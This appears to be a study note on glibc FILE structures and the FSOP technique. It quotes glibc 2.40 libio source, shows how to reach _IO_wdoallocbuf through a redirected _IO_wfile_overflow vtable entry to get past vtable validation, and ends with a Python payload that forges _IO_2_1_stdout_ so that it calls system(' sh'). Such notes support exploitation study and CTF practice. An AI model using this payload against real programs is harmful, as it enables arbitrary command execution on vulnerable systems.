File Structure Note

• ---

FILE Structure

FILE Structs in glibc

• _IO_FILE_PLUS structure
  
  source

struct _IO_FILE_plus
{
  FILE file;
  const struct _IO_jump_t *vtable;
};

• _IO_FILE

https://elixir.bootlin.com/glibc/glibc-2.40/source/libio/bits/types/struct_FILE.h#L49

struct _IO_FILE
{
  int _flags;		/* High-order word is _IO_MAGIC; rest is flags. */

  /* The following pointers correspond to the C++ streambuf protocol. */
  char *_IO_read_ptr;	/* Current read pointer */
  char *_IO_read_end;	/* End of get area. */
  char *_IO_read_base;	/* Start of putback+get area. */
  char *_IO_write_base;	/* Start of put area. */
  char *_IO_write_ptr;	/* Current put pointer. */
  char *_IO_write_end;	/* End of put area. */
  char *_IO_buf_base;	/* Start of reserve area. */
  char *_IO_buf_end;	/* End of reserve area. */

  /* The following fields are used to support backing up and undo. */
  char *_IO_save_base; /* Pointer to start of non-current get area. */
  char *_IO_backup_base;  /* Pointer to first valid character of backup area */
  char *_IO_save_end; /* Pointer to end of non-current get area. */

  struct _IO_marker *_markers;

  struct _IO_FILE *_chain;

  int _fileno;
  int _flags2;
  __off_t _old_offset; /* This used to be _offset but it's too small.  */

  /* 1+column number of pbase(); 0 is unknown. */
  unsigned short _cur_column;
  signed char _vtable_offset;
  char _shortbuf[1];

  _IO_lock_t *_lock;
#ifdef _IO_USE_OLD_IO_FILE
};

struct _IO_FILE_complete
{
  struct _IO_FILE _file;
#endif
  __off64_t _offset;
  /* Wide character stream stuff.  */
  struct _IO_codecvt *_codecvt;
  struct _IO_wide_data *_wide_data;
  struct _IO_FILE *_freeres_list;
  void *_freeres_buf;
  struct _IO_FILE **_prevchain;
  int _mode;
  /* Make sure we don't get into trouble again.  */
  char _unused2[15 * sizeof (int) - 5 * sizeof (void *)];
};

• _IO_jump_t

https://elixir.bootlin.com/glibc/glibc-2.40/source/libio/libioP.h#L294

struct _IO_jump_t
{
    JUMP_FIELD(size_t, __dummy);
    JUMP_FIELD(size_t, __dummy2);
    JUMP_FIELD(_IO_finish_t, __finish);
    JUMP_FIELD(_IO_overflow_t, __overflow);
    JUMP_FIELD(_IO_underflow_t, __underflow);
    JUMP_FIELD(_IO_underflow_t, __uflow);
    JUMP_FIELD(_IO_pbackfail_t, __pbackfail);
    /* showmany */
    JUMP_FIELD(_IO_xsputn_t, __xsputn);
    JUMP_FIELD(_IO_xsgetn_t, __xsgetn);
    JUMP_FIELD(_IO_seekoff_t, __seekoff);
    JUMP_FIELD(_IO_seekpos_t, __seekpos);
    JUMP_FIELD(_IO_setbuf_t, __setbuf);
    JUMP_FIELD(_IO_sync_t, __sync);
    JUMP_FIELD(_IO_doallocate_t, __doallocate);
    JUMP_FIELD(_IO_read_t, __read);
    JUMP_FIELD(_IO_write_t, __write);
    JUMP_FIELD(_IO_seek_t, __seek);
    JUMP_FIELD(_IO_close_t, __close);
    JUMP_FIELD(_IO_stat_t, __stat);
    JUMP_FIELD(_IO_showmanyc_t, __showmanyc);
    JUMP_FIELD(_IO_imbue_t, __imbue);
};

• _IO_FILE_complete
  https://elixir.bootlin.com/glibc/glibc-2.40/source/libio/bits/types/struct_FILE.h#L85

struct _IO_FILE_complete
{
  struct _IO_FILE _file;
#endif
  __off64_t _offset;
  /* Wide character stream stuff.  */
  struct _IO_codecvt *_codecvt;
  struct _IO_wide_data *_wide_data;
  struct _IO_FILE *_freeres_list;
  void *_freeres_buf;
  struct _IO_FILE **_prevchain;
  int _mode;
  /* Make sure we don't get into trouble again.  */
  char _unused2[15 * sizeof (int) - 5 * sizeof (void *)];
};

• _IO_FILE_complete_plus
  https://elixir.bootlin.com/glibc/glibc-2.40/source/libio/libioP.h#L335

struct _IO_FILE_complete_plus
{
  struct _IO_FILE_complete file;
  const struct _IO_jump_t *vtable;
};

• Magic Numbers

/* Magic number and bits for the _flags field.  The magic number is
   mostly vestigial, but preserved for compatibility.  It occupies the
   high 16 bits of _flags; the low 16 bits are actual flag bits.  */

#define _IO_MAGIC         0xFBAD0000 /* Magic number */
#define _IO_MAGIC_MASK    0xFFFF0000
#define _IO_USER_BUF          0x0001 /* Don't deallocate buffer on close. */
#define _IO_UNBUFFERED        0x0002
#define _IO_NO_READS          0x0004 /* Reading not allowed.  */
#define _IO_NO_WRITES         0x0008 /* Writing not allowed.  */
#define _IO_EOF_SEEN          0x0010
#define _IO_ERR_SEEN          0x0020
#define _IO_DELETE_DONT_CLOSE 0x0040 /* Don't call close(_fileno) on close.  */
#define _IO_LINKED            0x0080 /* In the list of all open files.  */
#define _IO_IN_BACKUP         0x0100
#define _IO_LINE_BUF          0x0200
#define _IO_TIED_PUT_GET      0x0400 /* Put and get pointer move in unison.  */
#define _IO_CURRENTLY_PUTTING 0x0800
#define _IO_IS_APPENDING      0x1000
#define _IO_IS_FILEBUF        0x2000
                           /* 0x4000  No longer used, reserved for compat.  */
#define _IO_USER_LOCK         0x8000

how vtable call function?

• example:_IO_doallocate

expand the macro

https://elixir.bootlin.com/glibc/glibc-2.40/source/libio/libioP.h#L222

https://elixir.bootlin.com/glibc/glibc-2.40/source/libio/libioP.h#L124

#define JUMP0(FUNC, THIS) (_IO_JUMPS_FUNC(THIS)->FUNC) (THIS)

https://elixir.bootlin.com/glibc/glibc-2.40/source/libio/libioP.h#L108

# define _IO_JUMPS_FUNC(THIS) \
  (IO_validate_vtable                                                   \
   (*(struct _IO_jump_t **) ((void *) &_IO_JUMPS_FILE_plus (THIS)	\
			     + (THIS)->_vtable_offset)))

in libc 2.24+ IO_validate_vtable will check if the vtable is legal (RO vtable section)
https://elixir.bootlin.com/glibc/glibc-2.40/source/libio/libioP.h#L1022

IO_validate_vtable (const struct _IO_jump_t *vtable)
{
  uintptr_t ptr = (uintptr_t) vtable;
  uintptr_t offset = ptr - (uintptr_t) &__io_vtables;
  if (__glibc_unlikely (offset >= IO_VTABLES_LEN))
    /* The vtable pointer is not in the expected section.  Use the
       slow path, which will terminate the process if necessary.  */
    _IO_vtable_check ();
  return vtable;
}

FSOP

before glibc 2.34 just do malloc/free hook hijack
but in newer versions it was not been used anymore

_IO_wfile_overflow() → _IO_wdoallocbuf()

• glibc 2.40
• craft fake _IO_2_1_stdout_

vfprintf_internal

https://elixir.bootlin.com/glibc/glibc-2.40/source/stdio-common/vfprintf-internal.c#L1521

int
vfprintf (FILE *s, const CHAR_T *format, va_list ap, unsigned int mode_flags)
{
  /* Orient the stream.  */
#ifdef ORIENT
  ORIENT;
#endif

  /* Sanity check of arguments.  */
  ARGCHECK (s, format);

#ifdef ORIENT
  /* Check for correct orientation.  */
  if (_IO_vtable_offset (s) == 0
      && _IO_fwide (s, sizeof (CHAR_T) == 1 ? -1 : 1)
      != (sizeof (CHAR_T) == 1 ? -1 : 1))
    /* The stream is already oriented otherwise.  */
    return EOF;
#endif

  if (!_IO_need_lock (s))
    {
      struct Xprintf (buffer_to_file) wrap;
      Xprintf (buffer_to_file_init) (&wrap, s);
      Xprintf_buffer (&wrap.base, format, ap, mode_flags);
      return Xprintf (buffer_to_file_done) (&wrap);
    }

  int done;

  /* Lock stream.  */
  _IO_cleanup_region_start ((void (*) (void *)) &_IO_funlockfile, s);
  _IO_flockfile (s);

  /* Set up the wrapping buffer.  */
  struct Xprintf (buffer_to_file) wrap;
  Xprintf (buffer_to_file_init) (&wrap, s);

  /* Perform the printing operation on the buffer.  */
  Xprintf_buffer (&wrap.base, format, ap, mode_flags);
  done = Xprintf (buffer_to_file_done) (&wrap);

  /* Unlock the stream.  */
  _IO_funlockfile (s);
  _IO_cleanup_region_end (0);

  return done;
}

from done = Xprintf(buffer_to_file_done) (&wrap);
jump to __printf_buffer_to_file_done

__printf_buffer_to_file_done

https://elixir.bootlin.com/glibc/glibc-2.40/source/stdio-common/printf_buffer_to_file.c#L116

int
__printf_buffer_to_file_done (struct __printf_buffer_to_file *buf)
{
  if (__printf_buffer_has_failed (&buf->base))
    return -1;
  __printf_buffer_flush_to_file (buf);
  return __printf_buffer_done (&buf->base);
}

__printf_buffer_flush_to_file

https://elixir.bootlin.com/glibc/glibc-2.40/source/stdio-common/printf_buffer_to_file.c#L48

void
__printf_buffer_flush_to_file (struct __printf_buffer_to_file *buf)
{
  /* The bytes in the buffer are always consumed.  */
  buf->base.written += buf->base.write_ptr - buf->base.write_base;

  if (buf->base.write_end == array_end (buf->stage))
    {
      /* If the stage buffer is used, make a copy into the file.  The
         stage buffer is always consumed fully, even if just partially
         written, to ensure that the file stream has all the data.  */
      size_t count = buf->base.write_ptr - buf->stage;
      if ((size_t) _IO_sputn (buf->fp, buf->stage, count) != count)
        {
          __printf_buffer_mark_failed (&buf->base);
          return;
        }
      /* buf->fp may have a buffer now.  */
      __printf_buffer_to_file_switch (buf);
      return;
    }
  else if (buf->base.write_end == buf->stage + 1)
    {
      /* Special one-character buffer case.  This is used to avoid
         flush-only overflow below.  */
      if (buf->base.write_ptr == buf->base.write_end)
        {
          if (__overflow (buf->fp, (unsigned char) *buf->stage) == EOF)
            {
              __printf_buffer_mark_failed (&buf->base);
              return;
            }
          __printf_buffer_to_file_switch (buf);
        }
      /* Else there is nothing to write.  */
      return;
    }

  /* We have written directly into the buf->fp buffer.  */
  assert (buf->base.write_end == buf->fp->_IO_write_end);

  /* Mark the bytes as written.  */
  buf->fp->_IO_write_ptr = buf->base.write_ptr;

  if (buf->base.write_ptr == buf->base.write_end)
    {
      /* The buffer in buf->fp has been filled.  This should just call
         __overflow (buf->fp, EOF), but flush-only overflow is obscure
         and not always correctly implemented.  See bug 28949.  Be
         conservative and switch to a one-character buffer instead, to
         obtain one more character for a regular __overflow call.  */
      buf->base.write_ptr = buf->stage;
      buf->base.write_end = buf->stage + 1;
    }
  /* The bytes in the file stream were already marked as written above.  */

  buf->base.write_base = buf->base.write_ptr;
}

wanted to call _IO_sputn which is vtable+0x38 but we can lead it into _IO_wfile_overflow also a legal segment

_IO_wfile_overflow

https://elixir.bootlin.com/glibc/glibc-2.40/source/libio/wfileops.c#L406

wint_t
_IO_wfile_overflow (FILE *f, wint_t wch)
{
  if (f->_flags & _IO_NO_WRITES) /* SET ERROR */
    {
      f->_flags |= _IO_ERR_SEEN;
      __set_errno (EBADF);
      return WEOF;
    }
  /* If currently reading or no buffer allocated. */
  if ((f->_flags & _IO_CURRENTLY_PUTTING) == 0
      || f->_wide_data->_IO_write_base == NULL)
    {
      /* Allocate a buffer if needed. */
      if (f->_wide_data->_IO_write_base == 0)
	{
	  _IO_wdoallocbuf (f);
	  _IO_free_wbackup_area (f);
	  _IO_wsetg (f, f->_wide_data->_IO_buf_base,
		     f->_wide_data->_IO_buf_base, f->_wide_data->_IO_buf_base);

	  if (f->_IO_write_base == NULL)
	    {
	      _IO_doallocbuf (f);
	      _IO_setg (f, f->_IO_buf_base, f->_IO_buf_base, f->_IO_buf_base);
	    }
	}
      else
	{
	  /* Otherwise must be currently reading.  If _IO_read_ptr
	     (and hence also _IO_read_end) is at the buffer end,
	     logically slide the buffer forwards one block (by setting
	     the read pointers to all point at the beginning of the
	     block).  This makes room for subsequent output.
	     Otherwise, set the read pointers to _IO_read_end (leaving
	     that alone, so it can continue to correspond to the
	     external position). */
	  if (f->_wide_data->_IO_read_ptr == f->_wide_data->_IO_buf_end)
	    {
	      f->_IO_read_end = f->_IO_read_ptr = f->_IO_buf_base;
	      f->_wide_data->_IO_read_end = f->_wide_data->_IO_read_ptr =
		f->_wide_data->_IO_buf_base;
	    }
	}
      f->_wide_data->_IO_write_ptr = f->_wide_data->_IO_read_ptr;
      f->_wide_data->_IO_write_base = f->_wide_data->_IO_write_ptr;
      f->_wide_data->_IO_write_end = f->_wide_data->_IO_buf_end;
      f->_wide_data->_IO_read_base = f->_wide_data->_IO_read_ptr =
	f->_wide_data->_IO_read_end;

      f->_IO_write_ptr = f->_IO_read_ptr;
      f->_IO_write_base = f->_IO_write_ptr;
      f->_IO_write_end = f->_IO_buf_end;
      f->_IO_read_base = f->_IO_read_ptr = f->_IO_read_end;

      f->_flags |= _IO_CURRENTLY_PUTTING;
      if (f->_flags & (_IO_LINE_BUF | _IO_UNBUFFERED))
	f->_wide_data->_IO_write_end = f->_wide_data->_IO_write_ptr;
    }
  if (wch == WEOF)
    return _IO_do_flush (f);
  if (f->_wide_data->_IO_write_ptr == f->_wide_data->_IO_buf_end)
    /* Buffer is really full */
    if (_IO_do_flush (f) == EOF)
      return WEOF;
  *f->_wide_data->_IO_write_ptr++ = wch;
  if ((f->_flags & _IO_UNBUFFERED)
      || ((f->_flags & _IO_LINE_BUF) && wch == L'\n'))
    if (_IO_do_flush (f) == EOF)
      return WEOF;
  return wch;
}
libc_hidden_def (_IO_wfile_overflow)

our final target is to call _IO_wdoallocbuf that we can control the fake vtable without checking the vtable

rdi is the _flags also used as the system parameter

• _flags & _IO_NO_WRITES == 0
  *rdi & 0x8 = 0

• _flags & _IO_CURRENTLY_PUTTING == 0
  *rdi & 0x0800 = 0
• _wide_data->_IO_write_base == 0
  _wide_data+0x28 = 0
  example: 0x00007ffff7fb3560+0x28=0
  

_IO_wdoallocbuf

https://elixir.bootlin.com/glibc/glibc-2.40/source/libio/wgenops.c#L364

void
_IO_wdoallocbuf (FILE *fp)
{
  if (fp->_wide_data->_IO_buf_base)
    return;
  if (!(fp->_flags & _IO_UNBUFFERED))
    if ((wint_t)_IO_WDOALLOCATE (fp) != WEOF)
      return;
  _IO_wsetb (fp, fp->_wide_data->_shortbuf,
		     fp->_wide_data->_shortbuf + 1, 0);
}
libc_hidden_def (_IO_wdoallocbuf)

• fp->_wide_data->_IO_buf_base==0
  _wide_data+0x40=0
• _flags & _IO_UNBUFFERED==0
  *rdi & 0x0002 = 0
• call _IO_WDOALLOCATE (fp)
  which is
  _wide_data->_wide_vtable->_IO_doallocate_t
  hijack it into system function
  *(*(_wide_data+0xe0)+0x68)=system

call system(_flags)

final exploit

summarize the requirements

• *vtable=_IO_wfile_overflow-0x38 , change the offset depend on the function it going to call
  -0x38 is _IO_sputn
• _flags & 0x8 = 0
• _flags & 0x800 = 0
• _flags & 0x2 = 0
• _wide_data+0x28 = 0
• _wide_data+0x40 = 0
• *(*(_wide_data+0xe0)+0x68)=system
• _mode=0xffffffff

fake _IO_2_1_stdout_

def libc(adr):
    offset = adr - 0x7FFFF7DC9000
    return libcbase + offset

# fsop

# *(_IO_2_1_stdout+0xa0) __wide_data
# 0xe0 wide_vtable
# 0x68 _IO_wdoallocbuf()
#
# 
# _flags & 0x8 = 0
# _flags & 0x800 = 0
# _flags & 0x2 = 0
# _wide_data+0x28 = 0
# _wide_data+0x40 = 0
# *(*(_wide_data+0xe0)+0x68)=system
# _mode=0xffffffff

_803 = heapbase + 0x2A0
_804 = heapbase + 0x6A0  # _IO_buf_base
system = libcbase + 0x000000000002F2D0

vtable = p64(libc(0x7FFFF7FB1240 - 0x38))
_wide_data_vtable = libc(0x7FFFF7FB3670 - 0x68)  # system  - 0x68
_wide_data = libc(0x7FFFF7FB3640 - 0xE0)

fsop_payload = p64(0) * 2
fsop_payload += b" sh u*/[" + p64(0)
fsop_payload += p64(_803) * 6 + p64(_804) + p64(0) * 4
fsop_payload += p64(libc(0x00007FFFF7FB28E0))  # copy from original vtable
fsop_payload += p64(1) + p64(0xFFFFFFFFFFFFFFFF)  # copy from original vtable
fsop_payload += p64(_wide_data_vtable) + p64(
    libc(0x00007FFFF7FB4770)
)  # copy from original vtable
fsop_payload += p64(0xFFFFFFFFFFFFFFFF) + p64(0)
fsop_payload += p64(_wide_data) + p64(0)
fsop_payload += p64(system) + p64(libcbase + 0x1EA548)  # copy from original
fsop_payload += p32(0xFFFFFFFF) + p32(0) + p64(0)  # _mode = -1 narrow character _mode
fsop_payload += p64(0) + vtable  # vtable

References

https://www.cnblogs.com/LynneHuan/p/17822091.html#利用_io_wfile_overflow函数控制程序执行流
https://hackmd.io/@naup96321/SyvhbZWYR
https://tttang.com/archive/1345/
https://www.mrskye.cn/archives/221/